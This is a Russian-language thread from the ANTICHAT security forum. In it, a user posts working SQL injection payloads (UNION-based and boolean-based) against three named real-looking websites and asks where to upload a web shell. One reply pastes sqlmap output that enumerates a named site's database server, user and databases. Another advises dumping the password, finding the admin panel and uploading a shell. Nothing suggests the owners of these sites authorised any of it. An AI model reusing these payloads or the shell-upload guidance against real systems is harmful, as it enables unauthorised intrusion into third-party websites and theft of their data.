ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
02.04.2018, 19:32
|
|
Новичок
Регистрация: 26.08.2009
Сообщений: 8
Провел на форуме:
375363
Репутация:
16
|
|
woodlandcenters.com/news.php?id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ
arvsolutions.co.uk/news.php?id=39' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ?
|
|
|
03.04.2018, 00:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
213865
Репутация:
72
|
|
Господи помилуй этого человека..
[23:20:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[23:20:32] [INFO] fetching current user
current user: 'justin@localhost'
[23:20:33] [INFO] fetching current database
current database: 'justin'
[23:20:33] [INFO] testing if current user is DBA
[23:20:33] [INFO] fetching current user
[23:20:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:20:33] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] justin
https://www.aldeid.com/wiki/From-com...tem-compromise |
|
|
|
03.04.2018, 00:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от Миxей
Миxей said:
↑
woodlandcenters.com/news.php?
id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ
arvsolutions.co.uk/news.php?id=39
' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12
UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ? Через уязвимость никак, сливайте пароль, ищите админку и пробуйте заливать шелл
|
|
|
|
03.04.2018, 01:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
213865
Репутация:
72
|
|
Сообщение от Миxей
Миxей said:
↑
woodlandcenters.com/news.php?
id=-3529 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171626a71,0x79634249 4373766a436e43444850717857576b696a64565a5074476165 714b644c63614a6a4b7675,0x716a707a71)-- NzCQ
arvsolutions.co.uk/news.php?id=39
' AND 3547=3547 AND 'OEvV'='OEvV
justindellojoio.com/news.php?id=12
UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b7071,0x6f76755243634 e55624c6143584167734f435768575273425876636a6d63766 35874497069734c53,0x716a767671),NULL,NULL,NULL-- reTC
Как узнать папку в которую можно залить shell ? Найди пол часа свободного времени для ознакомления
https://www.tenable.com/blog/configu...cation-attacks
Да бы знать что одних привелегий на запись файлов еще не досаточно. И вопрос по папкам там тоже присутствует.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
